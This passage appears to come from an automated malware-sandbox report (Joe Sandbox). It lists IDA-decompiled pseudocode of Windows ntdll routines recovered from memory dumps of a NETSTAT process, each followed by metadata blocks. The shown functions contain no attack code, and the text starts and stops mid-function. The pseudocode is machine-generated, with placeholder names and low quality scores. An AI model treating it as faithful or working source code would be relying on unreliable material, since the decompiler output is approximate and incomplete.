                						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                							_t48 = 0xc000090b;
                						}
                						goto L13;
                					}
                				}
                				_t48 = _t48 + 0xfffffff4;
                				goto L18;
                			}

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID: BinaryName
                • API String ID: 2994545307-215506332
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 33%
                			E0338D294(void* __ecx, char __edx, void* __eflags) {
                				signed int _v8;
                				char _v52;
                				signed int _v56;
                				signed int _v60;
                				intOrPtr _v64;
                				char* _v68;
                				intOrPtr _v72;
                				char _v76;
                				signed int _v84;
                				intOrPtr _v88;
                				char _v92;
                				intOrPtr _v96;
                				intOrPtr _v100;
                				char _v104;
                				char _v105;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t35;
                				char _t38;
                				signed int _t40;
                				signed int _t44;
                				signed int _t52;
                				void* _t53;
                				void* _t55;
                				void* _t61;
                				intOrPtr _t62;
                				void* _t64;
                				signed int _t65;
                				signed int _t66;
                
                				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                				_v8 =  *0x344d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                				_v105 = __edx;
                				_push( &_v92);
                				_t52 = 0;
                				_push(0);
                				_push(0);
                				_push( &_v104);
                				_push(0);
                				_t59 = __ecx;
                				_t55 = 2;
                				if(E03374120(_t55, __ecx) < 0) {
                					_t35 = 0;
                					L8:
                					_pop(_t61);
                					_pop(_t64);
                					_pop(_t53);
                					return E0339B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                				}
                				_v96 = _v100;
                				_t38 = _v92;
                				if(_t38 != 0) {
                					_v104 = _t38;
                					_v100 = _v88;
                					_t40 = _v84;
                				} else {
                					_t40 = 0;
                				}
                				_v72 = _t40;
                				_v68 =  &_v104;
                				_push( &_v52);
                				_v76 = 0x18;
                				_push( &_v76);
                				_v64 = 0x40;
                				_v60 = _t52;
                				_v56 = _t52;
                				_t44 = E033998D0();
                				_t62 = _v88;
                				_t65 = _t44;
                				if(_t62 != 0) {
                					asm("lock xadd [edi], eax");
                					if((_t44 | 0xffffffff) != 0) {
                						goto L4;
                					}
                					_push( *((intOrPtr*)(_t62 + 4)));
                					E033995D0();
                					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                					goto L4;
                				} else {
                					L4:
                					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                					if(_t65 >= 0) {
                						_t52 = 1;
                					} else {
                						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                						}
                					}
                					_t35 = _t52;
                					goto L8;
                				}
                			}

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E03361B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                				intOrPtr _v8;
                				char _v16;
                				intOrPtr* _t26;
                				intOrPtr _t29;
                				void* _t30;
                				signed int _t31;
                
                				_t27 = __ecx;
                				_t29 = __edx;
                				_t31 = 0;
                				_v8 = __edx;
                				if(__edx == 0) {
                					L18:
                					_t30 = 0xc000000d;
                					goto L12;
                				} else {
                					_t26 = _a4;
                					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                						goto L18;
                					} else {
                						E0339BB40(__ecx,  &_v16, __ecx);
                						_push(_t26);
                						_push(0);
                						_push(0);
                						_push(_t29);
                						_push( &_v16);
                						_t30 = E0339A9B0();
                						if(_t30 >= 0) {
                							_t19 =  *_t26;
                							if( *_t26 != 0) {
                								goto L7;
                							} else {
                								 *_a8 =  *_a8 & 0;
                							}
                						} else {
                							if(_t30 != 0xc0000023) {
                								L9:
                								_push(_t26);
                								_push( *_t26);
                								_push(_t31);
                								_push(_v8);
                								_push( &_v16);
                								_t30 = E0339A9B0();
                								if(_t30 < 0) {
                									L12:
                									if(_t31 != 0) {
                										L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                									}
                								} else {
                									 *_a8 = _t31;
                								}
                							} else {
                								_t19 =  *_t26;
                								if( *_t26 == 0) {
                									_t31 = 0;
                								} else {
                									L7:
                									_t31 = L03374620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                								}
                								if(_t31 == 0) {
                									_t30 = 0xc0000017;
                								} else {
                									goto L9;
                								}
                							}
                						}
                					}
                				}
                				return _t30;
                			}

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: WindowsExcludedProcs
                • API String ID: 0-3583428290
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0337F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                				intOrPtr _t13;
                				intOrPtr _t14;
                				signed int _t16;
                				signed char _t17;
                				intOrPtr _t19;
                				intOrPtr _t21;
                				intOrPtr _t23;
                				intOrPtr* _t25;
                
                				_t25 = _a8;
                				_t17 = __ecx;
                				if(_t25 == 0) {
                					_t19 = 0xc00000f2;
                					L8:
                					return _t19;
                				}
                				if((__ecx & 0xfffffffe) != 0) {
                					_t19 = 0xc00000ef;
                					goto L8;
                				}
                				_t19 = 0;
                				 *_t25 = 0;
                				_t21 = 0;
                				_t23 = "Actx ";
                				if(__edx != 0) {
                					if(__edx == 0xfffffffc) {
                						L21:
                						_t21 = 0x200;
                						L5:
                						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                						 *_t25 = _t13;
                						L6:
                						if(_t13 == 0) {
                							if((_t17 & 0x00000001) != 0) {
                								 *_t25 = _t23;
                							}
                						}
                						L7:
                						goto L8;
                					}
                					if(__edx == 0xfffffffd) {
                						 *_t25 = _t23;
                						_t13 = _t23;
                						goto L6;
                					}
                					_t13 =  *((intOrPtr*)(__edx + 0x10));
                					 *_t25 = _t13;
                					L14:
                					if(_t21 == 0) {
                						goto L6;
                					}
                					goto L5;
                				}
                				_t14 = _a4;
                				if(_t14 != 0) {
                					_t16 =  *(_t14 + 0x14) & 0x00000007;
                					if(_t16 <= 1) {
                						_t21 = 0x1f8;
                						_t13 = 0;
                						goto L14;
                					}
                					if(_t16 == 2) {
                						goto L21;
                					}
                					if(_t16 != 4) {
                						_t19 = 0xc00000f0;
                						goto L7;
                					}
                					_t13 = 0;
                					goto L6;
                				} else {
                					_t21 = 0x1f8;
                					goto L5;
                				}
                			}

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: Actx
                • API String ID: 0-89312691
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E03408DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                				intOrPtr _t35;
                				void* _t41;
                
                				_t40 = __esi;
                				_t39 = __edi;
                				_t38 = __edx;
                				_t35 = __ecx;
                				_t34 = __ebx;
                				_push(0x74);
                				_push(0x3430d50);
                				E033AD0E8(__ebx, __edi, __esi);
                				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                					E033E5720(0x65, 0, "Critical error detected %lx\n", _t35);
                					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                						asm("int3");
                						 *(_t41 - 4) = 0xfffffffe;
                					}
                				}
                				 *(_t41 - 4) = 1;
                				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                				 *((intOrPtr*)(_t41 - 0x64)) = L033ADEF0;
                				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                				_push(_t41 - 0x70);
                				L033ADEF0(1, _t38);
                				 *(_t41 - 4) = 0xfffffffe;
                				return E033AD130(_t34, _t39, _t40);
                			}
                Strings
                • Critical error detected %lx, xrefs: 03408E21
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: Critical error detected %lx
                • API String ID: 0-802127002
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 033EFF60
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                • API String ID: 0-1911121157
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E03425BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                				signed int _t296;
                				signed char _t298;
                				signed int _t301;
                				signed int _t306;
                				signed int _t310;
                				signed char _t311;
                				intOrPtr _t312;
                				signed int _t313;
                				void* _t327;
                				signed int _t328;
                				intOrPtr _t329;
                				intOrPtr _t333;
                				signed char _t334;
                				signed int _t336;
                				void* _t339;
                				signed int _t340;
                				signed int _t356;
                				signed int _t362;
                				short _t367;
                				short _t368;
                				short _t373;
                				signed int _t380;
                				void* _t382;
                				short _t385;
                				signed short _t392;
                				signed char _t393;
                				signed int _t395;
                				signed char _t397;
                				signed int _t398;
                				signed short _t402;
                				void* _t406;
                				signed int _t412;
                				signed char _t414;
                				signed short _t416;
                				signed int _t421;
                				signed char _t427;
                				intOrPtr _t434;
                				signed char _t435;
                				signed int _t436;
                				signed int _t442;
                				signed int _t446;
                				signed int _t447;
                				signed int _t451;
                				signed int _t453;
                				signed int _t454;
                				signed int _t455;
                				intOrPtr _t456;
                				intOrPtr* _t457;
                				short _t458;
                				signed short _t462;
                				signed int _t469;
                				intOrPtr* _t474;
                				signed int _t475;
                				signed int _t479;
                				signed int _t480;
                				signed int _t481;
                				short _t485;
                				signed int _t491;
                				signed int* _t494;
                				signed int _t498;
                				signed int _t505;
                				intOrPtr _t506;
                				signed short _t508;
                				signed int _t511;
                				void* _t517;
                				signed int _t519;
                				signed int _t522;
                				void* _t523;
                				signed int _t524;
                				void* _t528;
                				signed int _t529;
                
                				_push(0xd4);
                				_push(0x3431178);
                				E033AD0E8(__ebx, __edi, __esi);
                				_t494 = __edx;
                				 *(_t528 - 0xcc) = __edx;
                				_t511 = __ecx;
                				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                				 *(_t528 - 0xbc) = __ecx;
                				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                				_t427 = 0;
                				 *(_t528 - 0x74) = 0;
                				 *(_t528 - 0x9c) = 0;
                				 *(_t528 - 0x84) = 0;
                				 *(_t528 - 0xac) = 0;
                				 *(_t528 - 0x88) = 0;
                				 *(_t528 - 0xa8) = 0;
                				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                				if( *(_t528 + 0x1c) <= 0x80) {
                					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                					if(__eflags != 0) {
                						_t421 = E03424C56(0, __edx, __ecx, __eflags);
                						__eflags = _t421;
                						if(_t421 != 0) {
                							 *((intOrPtr*)(_t528 - 4)) = 0;
                							E0339D000(0x410);
                							 *(_t528 - 0x18) = _t529;
                							 *(_t528 - 0x9c) = _t529;
                							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                							E03425542(_t528 - 0x9c, _t528 - 0x84);
                						}
                					}
                					_t435 = _t427;
                					 *(_t528 - 0xd0) = _t435;
                					_t474 = _t511 + 0x65;
                					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                					_t511 = 0x18;
                					while(1) {
                						 *(_t528 - 0xa0) = _t427;
                						 *(_t528 - 0xbc) = _t427;
                						 *(_t528 - 0x80) = _t427;
                						 *(_t528 - 0x78) = 0x50;
                						 *(_t528 - 0x79) = _t427;
                						 *(_t528 - 0x7a) = _t427;
                						 *(_t528 - 0x8c) = _t427;
                						 *(_t528 - 0x98) = _t427;
                						 *(_t528 - 0x90) = _t427;
                						 *(_t528 - 0xb0) = _t427;
                						 *(_t528 - 0xb8) = _t427;
                						_t296 = 1 << _t435;
                						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                						__eflags = _t436 & _t296;
                						if((_t436 & _t296) != 0) {
                							goto L92;
                						}
                						__eflags =  *((char*)(_t474 - 1));
                						if( *((char*)(_t474 - 1)) == 0) {
                							goto L92;
                						}
                						_t301 =  *_t474;
                						__eflags = _t494[1] - _t301;
                						if(_t494[1] <= _t301) {
                							L10:
                							__eflags =  *(_t474 - 5) & 0x00000040;
                							if(( *(_t474 - 5) & 0x00000040) == 0) {
                								L12:
                								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                									goto L92;
                								}
                								_t442 =  *(_t474 - 0x11) & _t494[3];
                								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                									goto L92;
                								}
                								__eflags = _t442 -  *(_t474 - 0x11);
                								if(_t442 !=  *(_t474 - 0x11)) {
                									goto L92;
                								}
                								L15:
                								_t306 =  *(_t474 + 1) & 0x000000ff;
                								 *(_t528 - 0xc0) = _t306;
                								 *(_t528 - 0xa4) = _t306;
                								__eflags =  *0x34460e8;
                								if( *0x34460e8 != 0) {
                									__eflags = _t306 - 0x40;
                									if(_t306 < 0x40) {
                										L20:
                										asm("lock inc dword [eax]");
                										_t310 =  *0x34460e8; // 0x0
                										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                										__eflags = _t311 & 0x00000001;
                										if((_t311 & 0x00000001) == 0) {
                											 *(_t528 - 0xa0) = _t311;
                											_t475 = _t427;
                											 *(_t528 - 0x74) = _t427;
                											__eflags = _t475;
                											if(_t475 != 0) {
                												L91:
                												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                												goto L92;
                											}
                											asm("sbb edi, edi");
                											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                											_t511 = _t498;
                											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                											__eflags =  *(_t312 - 5) & 1;
                											if(( *(_t312 - 5) & 1) != 0) {
                												_push(_t528 - 0x98);
                												_push(0x4c);
                												_push(_t528 - 0x70);
                												_push(1);
                												_push(0xfffffffa);
                												_t412 = E03399710();
                												_t475 = _t427;
                												__eflags = _t412;
                												if(_t412 >= 0) {
                													_t414 =  *(_t528 - 0x98) - 8;
                													 *(_t528 - 0x98) = _t414;
                													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                													 *(_t528 - 0x8c) = _t416;
                													 *(_t528 - 0x79) = 1;
                													_t511 = (_t416 & 0x0000ffff) + _t498;
                													__eflags = _t511;
                												}
                											}
                											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                											__eflags = _t446 & 0x00000004;
                											if((_t446 & 0x00000004) != 0) {
                												__eflags =  *(_t528 - 0x9c);
                												if( *(_t528 - 0x9c) != 0) {
                													 *(_t528 - 0x7a) = 1;
                													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                													__eflags = _t511;
                												}
                											}
                											_t313 = 2;
                											_t447 = _t446 & _t313;
                											__eflags = _t447;
                											 *(_t528 - 0xd4) = _t447;
                											if(_t447 != 0) {
                												_t406 = 0x10;
                												_t511 = _t511 + _t406;
                												__eflags = _t511;
                											}
                											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                											 *(_t528 - 0x88) = _t427;
                											__eflags =  *(_t528 + 0x1c);
                											if( *(_t528 + 0x1c) <= 0) {
                												L45:
                												__eflags =  *(_t528 - 0xb0);
                												if( *(_t528 - 0xb0) != 0) {
                													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                													__eflags = _t511;
                												}
                												__eflags = _t475;
                												if(_t475 != 0) {
                													asm("lock dec dword [ecx+edx*8+0x4]");
                													goto L100;
                												} else {
                													_t494[3] = _t511;
                													_t451 =  *(_t528 - 0xa0);
                													_t427 = E03396DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                													 *(_t528 - 0x88) = _t427;
                													__eflags = _t427;
                													if(_t427 == 0) {
                														__eflags = _t511 - 0xfff8;
                														if(_t511 <= 0xfff8) {
                															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                															asm("sbb ecx, ecx");
                															__eflags = (_t451 & 0x000000e2) + 8;
                														}
                														asm("lock dec dword [eax+edx*8+0x4]");
                														L100:
                														goto L101;
                													}
                													_t453 =  *(_t528 - 0xa0);
                													 *_t494 = _t453;
                													_t494[1] = _t427;
                													_t494[2] =  *(_t528 - 0xbc);
                													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                													 *_t427 =  *(_t453 + 0x24) | _t511;
                													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                													asm("movsd");
                													asm("movsd");
                													asm("movsd");
                													asm("movsd");
                													asm("movsd");
                													asm("movsd");
                													asm("movsd");
                													asm("movsd");
                													__eflags =  *(_t528 + 0x14);
                													if( *(_t528 + 0x14) == 0) {
                														__eflags =  *[fs:0x18] + 0xf50;
                													}
                													asm("movsd");
                													asm("movsd");
                													asm("movsd");
                													asm("movsd");
                													__eflags =  *(_t528 + 0x18);
                													if( *(_t528 + 0x18) == 0) {
                														_t454 =  *(_t528 - 0x80);
                														_t479 =  *(_t528 - 0x78);
                														_t327 = 1;
                														__eflags = 1;
                													} else {
                														_t146 = _t427 + 0x50; // 0x50
                														_t454 = _t146;
                														 *(_t528 - 0x80) = _t454;
                														_t382 = 0x18;
                														 *_t454 = _t382;
                														 *((short*)(_t454 + 2)) = 1;
                														_t385 = 0x10;
                														 *((short*)(_t454 + 6)) = _t385;
                														 *(_t454 + 4) = 0;
                														asm("movsd");
                														asm("movsd");
                														asm("movsd");
                														asm("movsd");
                														_t327 = 1;
                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                														_t479 = 0x68;
                														 *(_t528 - 0x78) = _t479;
                													}
                													__eflags =  *(_t528 - 0x79) - _t327;
                													if( *(_t528 - 0x79) == _t327) {
                														_t524 = _t479 + _t427;
                														_t508 =  *(_t528 - 0x8c);
                														 *_t524 = _t508;
                														_t373 = 2;
                														 *((short*)(_t524 + 2)) = _t373;
                														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                														 *((short*)(_t524 + 4)) = 0;
                														_t167 = _t524 + 8; // 0x8
                														E0339F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                														_t529 = _t529 + 0xc;
                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                														 *(_t528 - 0x78) = _t479;
                														_t380 =  *(_t528 - 0x80);
                														__eflags = _t380;
                														if(_t380 != 0) {
                															_t173 = _t380 + 4;
                															 *_t173 =  *(_t380 + 4) | 1;
                															__eflags =  *_t173;
                														}
                														_t454 = _t524;
                														 *(_t528 - 0x80) = _t454;
                														_t327 = 1;
                														__eflags = 1;
                													}
                													__eflags =  *(_t528 - 0xd4);
                													if( *(_t528 - 0xd4) == 0) {
                														_t505 =  *(_t528 - 0x80);
                													} else {
                														_t505 = _t479 + _t427;
                														_t523 = 0x10;
                														 *_t505 = _t523;
                														_t367 = 3;
                														 *((short*)(_t505 + 2)) = _t367;
                														_t368 = 4;
                														 *((short*)(_t505 + 6)) = _t368;
                														 *(_t505 + 4) = 0;
                														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                														_t327 = 1;
                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                														_t479 = _t479 + _t523;
                														 *(_t528 - 0x78) = _t479;
                														__eflags = _t454;
                														if(_t454 != 0) {
                															_t186 = _t454 + 4;
                															 *_t186 =  *(_t454 + 4) | 1;
                															__eflags =  *_t186;
                														}
                														 *(_t528 - 0x80) = _t505;
                													}
                													__eflags =  *(_t528 - 0x7a) - _t327;
                													if( *(_t528 - 0x7a) == _t327) {
                														 *(_t528 - 0xd4) = _t479 + _t427;
                														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                														E0339F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                														_t529 = _t529 + 0xc;
                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                														_t479 =  *(_t528 - 0x78) + _t522;
                														 *(_t528 - 0x78) = _t479;
                														__eflags = _t505;
                														if(_t505 != 0) {
                															_t199 = _t505 + 4;
                															 *_t199 =  *(_t505 + 4) | 1;
                															__eflags =  *_t199;
                														}
                														_t505 =  *(_t528 - 0xd4);
                														 *(_t528 - 0x80) = _t505;
                													}
                													__eflags =  *(_t528 - 0xa8);
                													if( *(_t528 - 0xa8) != 0) {
                														_t356 = _t479 + _t427;
                														 *(_t528 - 0xd4) = _t356;
                														_t462 =  *(_t528 - 0xac);
                														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                														_t485 = 0xc;
                														 *((short*)(_t356 + 2)) = _t485;
                														 *(_t356 + 6) = _t462;
                														 *((short*)(_t356 + 4)) = 0;
                														_t211 = _t356 + 8; // 0x9
                														E0339F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                														E0339FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                														_t529 = _t529 + 0x18;
                														_t427 =  *(_t528 - 0x88);
                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                														_t505 =  *(_t528 - 0xd4);
                														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                														 *(_t528 - 0x78) = _t479;
                														_t362 =  *(_t528 - 0x80);
                														__eflags = _t362;
                														if(_t362 != 0) {
                															_t222 = _t362 + 4;
                															 *_t222 =  *(_t362 + 4) | 1;
                															__eflags =  *_t222;
                														}
                													}
                													__eflags =  *(_t528 - 0xb0);
                													if( *(_t528 - 0xb0) != 0) {
                														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                														_t458 = 0xb;
                														 *((short*)(_t479 + _t427 + 2)) = _t458;
                														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                														 *((short*)(_t427 + 4 + _t479)) = 0;
                														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                														E0339FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                														_t529 = _t529 + 0xc;
                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                														 *(_t528 - 0x78) = _t479;
                														__eflags = _t505;
                														if(_t505 != 0) {
                															_t241 = _t505 + 4;
                															 *_t241 =  *(_t505 + 4) | 1;
                															__eflags =  *_t241;
                														}
                													}
                													_t328 =  *(_t528 + 0x1c);
                													__eflags = _t328;
                													if(_t328 == 0) {
                														L87:
                														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                														_t455 =  *(_t528 - 0xdc);
                														 *(_t427 + 0x14) = _t455;
                														_t480 =  *(_t528 - 0xa0);
                														_t517 = 3;
                														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                															asm("rdtsc");
                															 *(_t427 + 0x3c) = _t480;
                														} else {
                															 *(_t427 + 0x3c) = _t455;
                														}
                														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                														_t456 =  *[fs:0x18];
                														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                														_t427 = 0;
                														__eflags = 0;
                														_t511 = 0x18;
                														goto L91;
                													} else {
                														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                														__eflags = _t519;
                														 *(_t528 - 0x8c) = _t328;
                														do {
                															_t506 =  *((intOrPtr*)(_t519 - 4));
                															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                															 *(_t528 - 0xd4) =  *(_t519 - 8);
                															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                															__eflags =  *(_t333 + 0x36) & 0x00004000;
                															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                																_t334 =  *_t519;
                															} else {
                																_t334 = 0;
                															}
                															_t336 = _t334 & 0x000000ff;
                															__eflags = _t336;
                															_t427 =  *(_t528 - 0x88);
                															if(_t336 == 0) {
                																_t481 = _t479 + _t506;
                																__eflags = _t481;
                																 *(_t528 - 0x78) = _t481;
                																E0339F3E0(_t479 + _t427, _t457, _t506);
                																_t529 = _t529 + 0xc;
                															} else {
                																_t340 = _t336 - 1;
                																__eflags = _t340;
                																if(_t340 == 0) {
                																	E0339F3E0( *(_t528 - 0xb8), _t457, _t506);
                																	_t529 = _t529 + 0xc;
                																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                																} else {
                																	__eflags = _t340 == 0;
                																	if(_t340 == 0) {
                																		__eflags = _t506 - 8;
                																		if(_t506 == 8) {
                																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                																		}
                																	}
                																}
                															}
                															_t339 = 0x10;
                															_t519 = _t519 + _t339;
                															_t263 = _t528 - 0x8c;
                															 *_t263 =  *(_t528 - 0x8c) - 1;
                															__eflags =  *_t263;
                															_t479 =  *(_t528 - 0x78);
                														} while ( *_t263 != 0);
                														goto L87;
                													}
                												}
                											} else {
                												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                												 *(_t528 - 0xa2) = _t392;
                												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                												__eflags = _t469;
                												while(1) {
                													 *(_t528 - 0xe4) = _t511;
                													__eflags = _t392;
                													_t393 = _t427;
                													if(_t392 != 0) {
                														_t393 =  *((intOrPtr*)(_t469 + 4));
                													}
